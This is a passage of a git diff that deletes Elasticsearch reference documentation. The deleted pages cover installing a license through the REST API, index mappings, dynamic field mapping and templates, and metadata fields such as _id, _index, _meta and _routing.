] -} ------------------------------------------------------------- -// TEST[skip:license testing issues] - -NOTE: These values are invalid; you must substitute the appropriate content -from your license file. - -You can also install your license file using a `curl` command. Be sure to add -`@` before the license file path to instruct curl to treat it as an input file. - -[source,shell] ------------------------------------------------------------- -curl -XPUT -u 'http://:/_license' -H "Content-Type: application/json" -d @license.json ------------------------------------------------------------- -// NOTCONSOLE - -On Windows, use the following command: - -[source,shell] ------------------------------------------------------------- -Invoke-WebRequest -uri http://:/_license -Credential elastic -Method Put -ContentType "application/json" -InFile .\license.json ------------------------------------------------------------- - -In these examples, - -* `` is a user ID with the appropriate authority. -* `` is the hostname of any node in the {es} cluster (`localhost` if - executing locally) -* `` is the http port (defaults to `9200`) -* `license.json` is the license JSON file - -NOTE: If your {es} node has SSL enabled on the HTTP interface, you must - start your URL with `https://` - -If you previously had a license with more features than the basic license, you -receive the following response: - -[source,js] ------------------------------------------------------------- - { - "acknowledged": false, - "license_status": "valid", - "acknowledge": { - "message": """This license update requires acknowledgement. To acknowledge the license, please read the following messages and update the license again, this time with the "acknowledge=true" parameter:""", - "watcher": [ - "Watcher will be disabled" - ], - "logstash": [ - "Logstash will no longer poll for centrally-managed pipelines" - ], - "security": [ - "The following X-Pack security functionality will be disabled: ..." ] - } -} ------------------------------------------------------------- -// NOTCONSOLE - -To complete the update, you must re-submit the API request and set the -`acknowledge` parameter to `true`. For example: - -[source,console] ------------------------------------------------------------- -PUT _license?acknowledge=true -{ - "licenses": [ - { - "uid":"893361dc-9749-4997-93cb-802e3d7fa4xx", - "type":"basic", - "issue_date_in_millis":1411948800000, - "expiry_date_in_millis":1914278399999, - "max_nodes":1, - "issued_to":"issuedTo", - "issuer":"issuer", - "signature":"xx" - } - ] -} ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Alternatively: - -[source,sh] ------------------------------------------------------------- -curl -XPUT -u elastic 'http://:/_license?acknowledge=true' -H "Content-Type: application/json" -d @license.json ------------------------------------------------------------- -// NOTCONSOLE - -For more information about the features that are disabled when your license -expires, see -{kibana-ref}/managing-licenses.html#license-expiration[License expiration]. diff --git a/docs/reference/links.asciidoc b/docs/reference/links.asciidoc deleted file mode 100644 index 11b6629d867..00000000000 --- a/docs/reference/links.asciidoc +++ /dev/null @@ -1,4 +0,0 @@ -// These attributes define common links in the Elasticsearch Reference - -:ml-docs-setup: {ml-docs}/setup.html[Set up {ml-features}] -:ml-docs-setup-privileges: {ml-docs}/setup.html#setup-privileges[{ml-cap} security privileges] diff --git a/docs/reference/mapping.asciidoc b/docs/reference/mapping.asciidoc deleted file mode 100644 index e146b1194f6..00000000000 --- a/docs/reference/mapping.asciidoc +++ /dev/null @@ -1,264 +0,0 @@ -[[mapping]] -= Mapping - -[partintro] --- - -Mapping is the process of defining how a document, and the fields it contains, -are stored and indexed. For instance, use mappings to define: - -* which string fields should be treated as full text fields. -* which fields contain numbers, dates, or geolocations. -* the <> of date values. -* custom rules to control the mapping for - <>. - -A mapping definition has: - -<>:: - -Metadata fields are used to customize how a document's associated metadata is -treated. Examples of metadata fields include the document's -<>, <>, and -<> fields. - -<>:: - -A mapping contains a list of fields or `properties` pertinent to the -document. Each field has its own <>. - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. -For more details, please see <>. - -[[mapping-limit-settings]] -[discrete] -=== Settings to prevent mappings explosion - -Defining too many fields in an index can lead to a -mapping explosion, which can cause out of memory errors and difficult -situations to recover from. - -Consider a situation where every new document inserted -introduces new fields, such as with <>. -Each new field is added to the index mapping, which can become a -problem as the mapping grows. - -Use the following settings to limit the number of field mappings (created manually or dynamically) and prevent documents from causing a mapping explosion: - -`index.mapping.total_fields.limit`:: - The maximum number of fields in an index. Field and object mappings, as well as - field aliases count towards this limit. The default value is `1000`. -+ -[IMPORTANT] -==== -The limit is in place to prevent mappings and searches from becoming too -large. Higher values can lead to performance degradations and memory issues, -especially in clusters with a high load or few resources. - -If you increase this setting, we recommend you also increase the -<> setting, which -limits the maximum number of <> in a query. -==== -+ -[TIP] -==== -If your field mappings contain a large, arbitrary set of keys, consider using the <> data type. -==== - -`index.mapping.depth.limit`:: - The maximum depth for a field, which is measured as the number of inner - objects. For instance, if all fields are defined at the root object level, - then the depth is `1`. If there is one object mapping, then the depth is - `2`, etc. Default is `20`. - -// tag::nested-fields-limit[] -`index.mapping.nested_fields.limit`:: - The maximum number of distinct `nested` mappings in an index. The `nested` type should only be used in special cases, when arrays of objects need to be queried independently of each other. To safeguard against poorly designed mappings, this setting - limits the number of unique `nested` types per index. Default is `50`. -// end::nested-fields-limit[] - -// tag::nested-objects-limit[] -`index.mapping.nested_objects.limit`:: - The maximum number of nested JSON objects that a single document can contain across all - `nested` types. This limit helps to prevent out of memory errors when a document contains too many nested - objects. Default is `10000`. -// end::nested-objects-limit[] - -`index.mapping.field_name_length.limit`:: - Setting for the maximum length of a field name. This setting isn't really something that addresses - mappings explosion but might still be useful if you want to limit the field length. - It usually shouldn't be necessary to set this setting. The default is okay - unless a user starts to add a huge number of fields with really long names. Default is - `Long.MAX_VALUE` (no limit). - -[discrete] -== Dynamic mapping - -Fields and mapping types do not need to be defined before being used. Thanks -to _dynamic mapping_, new field names will be added automatically, just by -indexing a document. New fields can be added both to the top-level mapping -type, and to inner <> and <> fields. - -The <> rules can be configured to customise -the mapping that is used for new fields. - -[discrete] -== Explicit mappings - -You know more about your data than Elasticsearch can guess, so while dynamic -mapping can be useful to get started, at some point you will want to specify -your own explicit mappings. - -You can create field mappings when you <> and -<>. - -[discrete] -[[create-mapping]] -== Create an index with an explicit mapping - -You can use the <> API to create a new index -with an explicit mapping. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "age": { "type": "integer" }, <1> - "email": { "type": "keyword" }, <2> - "name": { "type": "text" } <3> - } - } -} ----- - -<1> Creates `age`, an <> field -<2> Creates `email`, a <> field -<3> Creates `name`, a <> field - -[discrete] -[[add-field-mapping]] -== Add a field to an existing mapping - -You can use the <> API to add one or more new -fields to an existing index. - -The following example adds `employee-id`, a `keyword` field with an -<> mapping parameter value of `false`. This means values -for the `employee-id` field are stored but not indexed or available for search. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "employee-id": { - "type": "keyword", - "index": false - } - } -} ----- -// TEST[continued] - -[discrete] -[[update-mapping]] -=== Update the mapping of a field - -include::{es-repo-dir}/indices/put-mapping.asciidoc[tag=change-field-mapping] - -include::{es-repo-dir}/indices/put-mapping.asciidoc[tag=rename-field] - -[discrete] -[[view-mapping]] -== View the mapping of an index - -You can use the <> API to view the mapping of -an existing index. - -[source,console] ----- -GET /my-index-000001/_mapping ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-index-000001" : { - "mappings" : { - "properties" : { - "age" : { - "type" : "integer" - }, - "email" : { - "type" : "keyword" - }, - "employee-id" : { - "type" : "keyword", - "index" : false - }, - "name" : { - "type" : "text" - } - } - } - } -} ----- - - -[discrete] -[[view-field-mapping]] -== View the mapping of specific fields - -If you only want to view the mapping of one or more specific fields, you can use -the <> API. - -This is useful if you don't need the complete mapping of an index or your index -contains a large number of fields. - -The following request retrieves the mapping for the `employee-id` field. - -[source,console] ----- -GET /my-index-000001/_mapping/field/employee-id ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-index-000001" : { - "mappings" : { - "employee-id" : { - "full_name" : "employee-id", - "mapping" : { - "employee-id" : { - "type" : "keyword", - "index" : false - } - } - } - } - } -} - ----- - --- - -include::mapping/removal_of_types.asciidoc[] - -include::mapping/types.asciidoc[] - -include::mapping/fields.asciidoc[] - -include::mapping/params.asciidoc[] - -include::mapping/dynamic-mapping.asciidoc[] diff --git a/docs/reference/mapping/dynamic-mapping.asciidoc b/docs/reference/mapping/dynamic-mapping.asciidoc deleted file mode 100644 index 54d373e1e29..00000000000 --- a/docs/reference/mapping/dynamic-mapping.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ -[[dynamic-mapping]] -== Dynamic Mapping - -One of the most important features of Elasticsearch is that it tries to get -out of your way and let you start exploring your data as quickly as possible. -To index a document, you don't have to first create an index, define a mapping -type, and define your fields -- you can just index a document and the index, -type, and fields will spring to life automatically: - -[source,console] --------------------------------------------------- -PUT data/_doc/1 <1> -{ "count": 5 } --------------------------------------------------- - -<1> Creates the `data` index, the `_doc` mapping type, and a field - called `count` with data type `long`. - -The automatic detection and addition of new fields is called -_dynamic mapping_. The dynamic mapping rules can be customised to suit your -purposes with: - -<>:: - - The rules governing dynamic field detection. - -<>:: - - Custom rules to configure the mapping for dynamically added fields. - -TIP: <> allow you to configure the default -mappings, settings and aliases for new indices, whether created -automatically or explicitly. - -include::dynamic/field-mapping.asciidoc[] - -include::dynamic/templates.asciidoc[] - diff --git a/docs/reference/mapping/dynamic/field-mapping.asciidoc b/docs/reference/mapping/dynamic/field-mapping.asciidoc deleted file mode 100644 index c1652baf2d2..00000000000 --- a/docs/reference/mapping/dynamic/field-mapping.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ -[[dynamic-field-mapping]] -=== Dynamic field mapping - -By default, when a previously unseen field is found in a document, -Elasticsearch will add the new field to the type mapping. This behaviour can -be disabled, both at the document and at the <> level, by -setting the <> parameter to `false` (to ignore new fields) or to `strict` (to throw -an exception if an unknown field is encountered). - -Assuming `dynamic` field mapping is enabled, some simple rules are used to -determine which data type the field should have: - -[horizontal] -*JSON data type*:: *Elasticsearch data type* - -`null`:: No field is added. -`true` or `false`:: <> field -floating{nbsp}point{nbsp}number:: <> field -integer:: <> field -object:: <> field -array:: Depends on the first non-`null` value in the array. -string:: Either a <> field - (if the value passes <>), - a <> or <> field - (if the value passes <>) - or a <> field, with a <> sub-field. - -These are the only <> that are dynamically -detected. All other data types must be mapped explicitly. - -Besides the options listed below, dynamic field mapping rules can be further -customised with <>. - -[[date-detection]] -==== Date detection - -If `date_detection` is enabled (default), then new string fields are checked -to see whether their contents match any of the date patterns specified in -`dynamic_date_formats`. If a match is found, a new <> field is -added with the corresponding format. - -The default value for `dynamic_date_formats` is: - -[ <>,`"yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z"`] - -For example: - - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "create_date": "2015/09/02" -} - -GET my-index-000001/_mapping <1> --------------------------------------------------- - -<1> The `create_date` field has been added as a <> - field with the <>: + - `"yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z"`. - -===== Disabling date detection - -Dynamic date detection can be disabled by setting `date_detection` to `false`: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "date_detection": false - } -} - -PUT my-index-000001/_doc/1 <1> -{ - "create": "2015/09/02" -} --------------------------------------------------- - -<1> The `create_date` field has been added as a <> field. - -===== Customising detected date formats - -Alternatively, the `dynamic_date_formats` can be customised to support your -own <>: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_date_formats": ["MM/dd/yyyy"] - } -} - -PUT my-index-000001/_doc/1 -{ - "create_date": "09/25/2015" -} --------------------------------------------------- - - -[[numeric-detection]] -==== Numeric detection - -While JSON has support for native floating point and integer data types, some -applications or languages may sometimes render numbers as strings. Usually the -correct solution is to map these fields explicitly, but numeric detection -(which is disabled by default) can be enabled to do this automatically: - - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "numeric_detection": true - } -} - -PUT my-index-000001/_doc/1 -{ - "my_float": "1.0", <1> - "my_integer": "1" <2> -} --------------------------------------------------- - -<1> The `my_float` field is added as a <> field. -<2> The `my_integer` field is added as a <> field. - diff --git a/docs/reference/mapping/dynamic/templates.asciidoc b/docs/reference/mapping/dynamic/templates.asciidoc deleted file mode 100644 index 83b7dd65376..00000000000 --- a/docs/reference/mapping/dynamic/templates.asciidoc +++ /dev/null @@ -1,426 +0,0 @@ -[[dynamic-templates]] -=== Dynamic templates - -Dynamic templates allow you to define custom mappings that can be applied to -dynamically added fields based on: - -* the <> detected by Elasticsearch, with <>. -* the name of the field, with <> or <>. -* the full dotted path to the field, with <>. - -The original field name `{name}` and the detected data type -`{dynamic_type}` <> can be used in -the mapping specification as placeholders. - -IMPORTANT: Dynamic field mappings are only added when a field contains a -concrete value -- not `null` or an empty array. This means that if the -`null_value` option is used in a `dynamic_template`, it will only be applied -after the first document with a concrete value for the field has been -indexed. - -Dynamic templates are specified as an array of named objects: - -[source,js] --------------------------------------------------- - "dynamic_templates": [ - { - "my_template_name": { <1> - ... match conditions ... <2> - "mapping": { ... } <3> - } - }, - ... - ] --------------------------------------------------- -// NOTCONSOLE -<1> The template name can be any string value. -<2> The match conditions can include any of : `match_mapping_type`, `match`, `match_pattern`, `unmatch`, `path_match`, `path_unmatch`. -<3> The mapping that the matched field should use. - -If a provided mapping contains an invalid mapping snippet, a validation error -is returned. Validation occurs when applying the dynamic template at index time, -and, in most cases, when the dynamic template is updated. Providing an invalid mapping -snippet may cause the update or validation of a dynamic template to fail under certain conditions: - -* If no `match_mapping_type` has been specified but the template is valid for at least one predefined mapping type, - the mapping snippet is considered valid. However, a validation error is returned at index time if a field matching - the template is indexed as a different type. For example, configuring a dynamic template with no `match_mapping_type` - is considered valid as string type, but if a field matching the dynamic template is indexed as a long, a validation - error is returned at index time. - -* If the `{name}` placeholder is used in the mapping snippet, validation is skipped when updating the dynamic - template. This is because the field name is unknown at that time. Instead, validation occurs when the template is applied - at index time. - -Templates are processed in order -- the first matching template wins. When -putting new dynamic templates through the <> API, -all existing templates are overwritten. This allows for dynamic templates to be -reordered or deleted after they were initially added. - -[[match-mapping-type]] -==== `match_mapping_type` - -The `match_mapping_type` is the data type detected by the JSON parser. Since -JSON doesn't distinguish a `long` from an `integer` or a `double` from -a `float`, it will always choose the wider data type, i.e. `long` for integers -and `double` for floating-point numbers. - -The following data types may be automatically detected: - - - `boolean` when `true` or `false` are encountered. - - `date` when <> is enabled and a string matching - any of the configured date formats is found. - - `double` for numbers with a decimal part. - - `long` for numbers without a decimal part. - - `object` for objects, also called hashes. - - `string` for character strings. - -`*` may also be used in order to match all data types. - -For example, if we wanted to map all integer fields as `integer` instead of -`long`, and all `string` fields as both `text` and `keyword`, we -could use the following template: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "integers": { - "match_mapping_type": "long", - "mapping": { - "type": "integer" - } - } - }, - { - "strings": { - "match_mapping_type": "string", - "mapping": { - "type": "text", - "fields": { - "raw": { - "type": "keyword", - "ignore_above": 256 - } - } - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "my_integer": 5, <1> - "my_string": "Some string" <2> -} --------------------------------------------------- - -<1> The `my_integer` field is mapped as an `integer`. -<2> The `my_string` field is mapped as a `text`, with a `keyword` <>. - - -[[match-unmatch]] -==== `match` and `unmatch` - -The `match` parameter uses a pattern to match on the field name, while -`unmatch` uses a pattern to exclude fields matched by `match`. - -The following example matches all `string` fields whose name starts with -`long_` (except for those which end with `_text`) and maps them as `long` -fields: - - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "longs_as_strings": { - "match_mapping_type": "string", - "match": "long_*", - "unmatch": "*_text", - "mapping": { - "type": "long" - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "long_num": "5", <1> - "long_text": "foo" <2> -} --------------------------------------------------- - -<1> The `long_num` field is mapped as a `long`. -<2> The `long_text` field uses the default `string` mapping. - -[[match-pattern]] -==== `match_pattern` - -The `match_pattern` parameter adjusts the behavior of the `match` parameter -such that it supports full Java regular expression matching on the field name -instead of simple wildcards, for instance: - -[source,js] --------------------------------------------------- - "match_pattern": "regex", - "match": "^profit_\d+$" --------------------------------------------------- -// NOTCONSOLE - -[[path-match-unmatch]] -==== `path_match` and `path_unmatch` - -The `path_match` and `path_unmatch` parameters work in the same way as `match` -and `unmatch`, but operate on the full dotted path to the field, not just the -final name, e.g. `some_object.*.some_field`. - -This example copies the values of any fields in the `name` object to the -top-level `full_name` field, except for the `middle` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "full_name": { - "path_match": "name.*", - "path_unmatch": "*.middle", - "mapping": { - "type": "text", - "copy_to": "full_name" - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "name": { - "first": "John", - "middle": "Winston", - "last": "Lennon" - } -} --------------------------------------------------- - -Note that the `path_match` and `path_unmatch` parameters match on object paths -in addition to leaf fields. As an example, indexing the following document will -result in an error because the `path_match` setting also matches the object -field `name.title`, which can't be mapped as text: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/2 -{ - "name": { - "first": "Paul", - "last": "McCartney", - "title": { - "value": "Sir", - "category": "order of chivalry" - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[catch:bad_request] - -[[template-variables]] -==== `{name}` and `{dynamic_type}` - -The `{name}` and `{dynamic_type}` placeholders are replaced in the `mapping` -with the field name and detected dynamic type. The following example sets all -string fields to use an <> with the same name as the -field, and disables <> for all non-string fields: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "named_analyzers": { - "match_mapping_type": "string", - "match": "*", - "mapping": { - "type": "text", - "analyzer": "{name}" - } - } - }, - { - "no_doc_values": { - "match_mapping_type":"*", - "mapping": { - "type": "{dynamic_type}", - "doc_values": false - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "english": "Some English text", <1> - "count": 5 <2> -} --------------------------------------------------- -// TEST[warning:Parameter [doc_values] has no effect on type [text] and will be removed in future] - -<1> The `english` field is mapped as a `string` field with the `english` analyzer. -<2> The `count` field is mapped as a `long` field with `doc_values` disabled. - -[[template-examples]] -==== Template examples - -Here are some examples of potentially useful dynamic templates: - -===== Structured search - -By default Elasticsearch will map string fields as a `text` field with a sub -`keyword` field. However if you are only indexing structured content and not -interested in full text search, you can make Elasticsearch map your fields -only as `keyword`s. Note that this means that in order to search those fields, -you will have to search on the exact same value that was indexed. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "strings_as_keywords": { - "match_mapping_type": "string", - "mapping": { - "type": "keyword" - } - } - } - ] - } -} --------------------------------------------------- - -[[text-only-mappings-strings]] -===== `text`-only mappings for strings - -On the contrary to the previous example, if the only thing that you care about -on your string fields is full-text search, and if you don't plan on running -aggregations, sorting or exact search on your string fields, you could tell -Elasticsearch to map it only as a text field (which was the default behaviour -before 5.0): - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "strings_as_text": { - "match_mapping_type": "string", - "mapping": { - "type": "text" - } - } - } - ] - } -} --------------------------------------------------- - -===== Disabled norms - -Norms are index-time scoring factors. If you do not care about scoring, which -would be the case for instance if you never sort documents by score, you could -disable the storage of these scoring factors in the index and save some space. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "strings_as_keywords": { - "match_mapping_type": "string", - "mapping": { - "type": "text", - "norms": false, - "fields": { - "keyword": { - "type": "keyword", - "ignore_above": 256 - } - } - } - } - } - ] - } -} --------------------------------------------------- - -The sub `keyword` field appears in this template to be consistent with the -default rules of dynamic mappings. Of course if you do not need them because -you don't need to perform exact search or aggregate on this field, you could -remove it as described in the previous section. - -===== Time series - -When doing time series analysis with Elasticsearch, it is common to have many -numeric fields that you will often aggregate on but never filter on. In such a -case, you could disable indexing on those fields to save disk space and also -maybe gain some indexing speed: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "unindexed_longs": { - "match_mapping_type": "long", - "mapping": { - "type": "long", - "index": false - } - } - }, - { - "unindexed_doubles": { - "match_mapping_type": "double", - "mapping": { - "type": "float", <1> - "index": false - } - } - } - ] - } -} --------------------------------------------------- - -<1> Like the default dynamic mapping rules, doubles are mapped as floats, which - are usually accurate enough, yet require half the disk space. diff --git a/docs/reference/mapping/fields.asciidoc b/docs/reference/mapping/fields.asciidoc deleted file mode 100644 index df9dbb376b5..00000000000 --- a/docs/reference/mapping/fields.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[mapping-fields]] -== Metadata fields - -Each document has metadata associated with it, such as the `_index`, mapping -<>, and `_id` metadata fields. The behavior of -some of these metadata fields can be customized when a mapping type is created. - -[discrete] -=== Identity metadata fields - -[horizontal] -<>:: - - The index to which the document belongs. - -<>:: - - The document's mapping type. - -<>:: - - The document's ID. - -[discrete] -=== Document source metadata fields - -<>:: - - The original JSON representing the body of the document. - -{plugins}/mapper-size.html[`_size`]:: - - The size of the `_source` field in bytes, provided by the - {plugins}/mapper-size.html[`mapper-size` plugin]. - -[discrete] -=== Indexing metadata fields - -<>:: - - All fields in the document which contain non-null values. - -<>:: - - All fields in the document that have been ignored at index time because of - <>. - -[discrete] -=== Routing metadata field - -<>:: - - A custom routing value which routes a document to a particular shard. - -[discrete] -=== Other metadata field - -<>:: - - Application specific metadata. - - -include::fields/field-names-field.asciidoc[] - -include::fields/ignored-field.asciidoc[] - -include::fields/id-field.asciidoc[] - -include::fields/index-field.asciidoc[] - -include::fields/meta-field.asciidoc[] - -include::fields/routing-field.asciidoc[] - -include::fields/source-field.asciidoc[] - -include::fields/type-field.asciidoc[] - diff --git a/docs/reference/mapping/fields/field-names-field.asciidoc b/docs/reference/mapping/fields/field-names-field.asciidoc deleted file mode 100644 index 282750dc54f..00000000000 --- a/docs/reference/mapping/fields/field-names-field.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[mapping-field-names-field]] -=== `_field_names` field - -The `_field_names` field used to index the names of every field in a document that -contains any value other than `null`. This field was used by the -<> query to find documents that -either have or don't have any non-+null+ value for a particular field. - -Now the `_field_names` field only indexes the names of fields that have -`doc_values` and `norms` disabled. For fields which have either `doc_values` -or `norm` enabled the <> query will still -be available but will not use the `_field_names` field. - -[[disable-field-names]] -==== Disabling `_field_names` - -NOTE: Disabling `_field_names` has been deprecated and will be removed in a future major version. - -Disabling `_field_names` is usually not necessary because it no longer -carries the index overhead it once did. If you have a lot of fields -which have `doc_values` and `norms` disabled and you do not need to -execute `exists` queries using those fields you might want to disable -`_field_names` by adding the following to the mappings: - -[source,console] --------------------------------------------------- -PUT tweets -{ - "mappings": { - "_field_names": { - "enabled": false - } - } -} --------------------------------------------------- -// TEST[warning:Disabling _field_names is not necessary because it no longer carries a large index overhead. Support for the `enabled` setting will be removed in a future major version. Please remove it from your mappings and templates.] diff --git a/docs/reference/mapping/fields/id-field.asciidoc b/docs/reference/mapping/fields/id-field.asciidoc deleted file mode 100644 index 1e963dd6de7..00000000000 --- a/docs/reference/mapping/fields/id-field.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[mapping-id-field]] -=== `_id` field - -Each document has an `_id` that uniquely identifies it, which is indexed -so that documents can be looked up either with the <> or the -<>. The `_id` can either be assigned at -indexing time, or a unique `_id` can be generated by {es}. This field is not -configurable in the mappings. - -The value of the `_id` field is accessible in queries such as `term`, -`terms`, `match`, and `query_string`. - -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "text": "Document with ID 1" -} - -PUT my-index-000001/_doc/2?refresh=true -{ - "text": "Document with ID 2" -} - -GET my-index-000001/_search -{ - "query": { - "terms": { - "_id": [ "1", "2" ] <1> - } - } -} --------------------------- - -<1> Querying on the `_id` field (also see the <>) - -The `_id` field is restricted from use in aggregations, sorting, and scripting. -In case sorting or aggregating on the `_id` field is required, it is advised to -duplicate the content of the `_id` field into another field that has -`doc_values` enabled. - -[NOTE] -================================================== -`_id` is limited to 512 bytes in size and larger values will be rejected. -================================================== diff --git a/docs/reference/mapping/fields/ignored-field.asciidoc b/docs/reference/mapping/fields/ignored-field.asciidoc deleted file mode 100644 index c22e6398892..00000000000 --- a/docs/reference/mapping/fields/ignored-field.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[mapping-ignored-field]] -=== `_ignored` field - -added[6.4.0] - -The `_ignored` field indexes and stores the names of every field in a document -that has been ignored because it was malformed and -<> was turned on. - -This field is searchable with <>, -<> and <> -queries, and is returned as part of the search hits. - -For instance the below query matches all documents that have one or more fields -that got ignored: - -[source,console] --------------------------------------------------- -GET _search -{ - "query": { - "exists": { - "field": "_ignored" - } - } -} --------------------------------------------------- - -Similarly, the below query finds all documents whose `@timestamp` field was -ignored at index time: - -[source,console] --------------------------------------------------- -GET _search -{ - "query": { - "term": { - "_ignored": "@timestamp" - } - } -} --------------------------------------------------- diff --git a/docs/reference/mapping/fields/index-field.asciidoc b/docs/reference/mapping/fields/index-field.asciidoc deleted file mode 100644 index 87e55e992c2..00000000000 --- a/docs/reference/mapping/fields/index-field.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[mapping-index-field]] -=== `_index` field - -When performing queries across multiple indexes, it is sometimes desirable to -add query clauses that are associated with documents of only certain indexes. -The `_index` field allows matching on the index a document was indexed into. -Its value is accessible in certain queries and aggregations, and when sorting -or scripting: - -[source,console] --------------------------- -PUT index_1/_doc/1 -{ - "text": "Document in index 1" -} - -PUT index_2/_doc/2?refresh=true -{ - "text": "Document in index 2" -} - -GET index_1,index_2/_search -{ - "query": { - "terms": { - "_index": ["index_1", "index_2"] <1> - } - }, - "aggs": { - "indices": { - "terms": { - "field": "_index", <2> - "size": 10 - } - } - }, - "sort": [ - { - "_index": { <3> - "order": "asc" - } - } - ], - "script_fields": { - "index_name": { - "script": { - "lang": "painless", - "source": "doc['_index']" <4> - } - } - } -} --------------------------- - -<1> Querying on the `_index` field -<2> Aggregating on the `_index` field -<3> Sorting on the `_index` field -<4> Accessing the `_index` field in scripts - -The `_index` field is exposed virtually -- it is not added to the Lucene index -as a real field. This means that you can use the `_index` field in a `term` or -`terms` query (or any query that is rewritten to a `term` query, such as the -`match`, `query_string` or `simple_query_string` query), as well as `prefix` -and `wildcard` queries. However, it does not support `regexp` and `fuzzy` -queries. - -Queries on the `_index` field accept index aliases in addition to concrete -index names. - -NOTE: When specifying a remote index name such as `cluster_1:index_3`, the -query must contain the separator character `:`. For example, a `wildcard` query -on `cluster_*:index_3` would match documents from the remote index. However, a -query on `cluster*index_1` is only matched against local indices, since no -separator is present. This behavior aligns with the usual resolution rules for -remote index names. diff --git a/docs/reference/mapping/fields/meta-field.asciidoc b/docs/reference/mapping/fields/meta-field.asciidoc deleted file mode 100644 index 141a5de7258..00000000000 --- a/docs/reference/mapping/fields/meta-field.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[mapping-meta-field]] -=== `_meta` field - -A mapping type can have custom meta data associated with it. These are not -used at all by Elasticsearch, but can be used to store application-specific -metadata, such as the class that a document belongs to: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "_meta": { <1> - "class": "MyApp::User", - "version": { - "min": "1.0", - "max": "1.3" - } - } - } -} --------------------------------------------------- - -<1> This `_meta` info can be retrieved with the - <> API. - -The `_meta` field can be updated on an existing type using the -<> API: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_mapping -{ - "_meta": { - "class": "MyApp2::User3", - "version": { - "min": "1.3", - "max": "1.5" - } - } -} --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/mapping/fields/routing-field.asciidoc b/docs/reference/mapping/fields/routing-field.asciidoc deleted file mode 100644 index 0da9f2469e7..00000000000 --- a/docs/reference/mapping/fields/routing-field.asciidoc +++ /dev/null @@ -1,134 +0,0 @@ -[[mapping-routing-field]] -=== `_routing` field - -A document is routed to a particular shard in an index using the following -formula: - - shard_num = hash(_routing) % num_primary_shards - -The default value used for `_routing` is the document's <>. - -Custom routing patterns can be implemented by specifying a custom `routing` -value per document. For instance: - -[source,console] ------------------------------- -PUT my-index-000001/_doc/1?routing=user1&refresh=true <1> -{ - "title": "This is a document" -} - -GET my-index-000001/_doc/1?routing=user1 <2> ------------------------------- -// TESTSETUP - -<1> This document uses `user1` as its routing value, instead of its ID. -<2> The same `routing` value needs to be provided when - <>, <>, or <> - the document. - -The value of the `_routing` field is accessible in queries: - -[source,console] --------------------------- -GET my-index-000001/_search -{ - "query": { - "terms": { - "_routing": [ "user1" ] <1> - } - } -} --------------------------- - -<1> Querying on the `_routing` field (also see the <>) - -NOTE: Data streams do not support custom routing. Instead, target the -appropriate backing index for the stream. - -==== Searching with custom routing - -Custom routing can reduce the impact of searches. Instead of having to fan -out a search request to all the shards in an index, the request can be sent to -just the shard that matches the specific routing value (or values): - -[source,console] ------------------------------- -GET my-index-000001/_search?routing=user1,user2 <1> -{ - "query": { - "match": { - "title": "document" - } - } -} ------------------------------- - -<1> This search request will only be executed on the shards associated with the `user1` and `user2` routing values. - - -==== Making a routing value required - -When using custom routing, it is important to provide the routing value -whenever <>, <>, -<>, or <> a document. - -Forgetting the routing value can lead to a document being indexed on more than -one shard. As a safeguard, the `_routing` field can be configured to make a -custom `routing` value required for all CRUD operations: - -[source,console] ------------------------------- -PUT my-index-000002 -{ - "mappings": { - "_routing": { - "required": true <1> - } - } -} - -PUT my-index-000002/_doc/1 <2> -{ - "text": "No routing value provided" -} ------------------------------- -// TEST[catch:bad_request] - -<1> Routing is required for all documents. -<2> This index request throws a `routing_missing_exception`. - -==== Unique IDs with custom routing - -When indexing documents specifying a custom `_routing`, the uniqueness of the -`_id` is not guaranteed across all of the shards in the index. In fact, -documents with the same `_id` might end up on different shards if indexed with -different `_routing` values. - -It is up to the user to ensure that IDs are unique across the index. - -[[routing-index-partition]] -==== Routing to an index partition - -An index can be configured such that custom routing values will go to a subset of the shards rather -than a single shard. This helps mitigate the risk of ending up with an imbalanced cluster while still -reducing the impact of searches. - -This is done 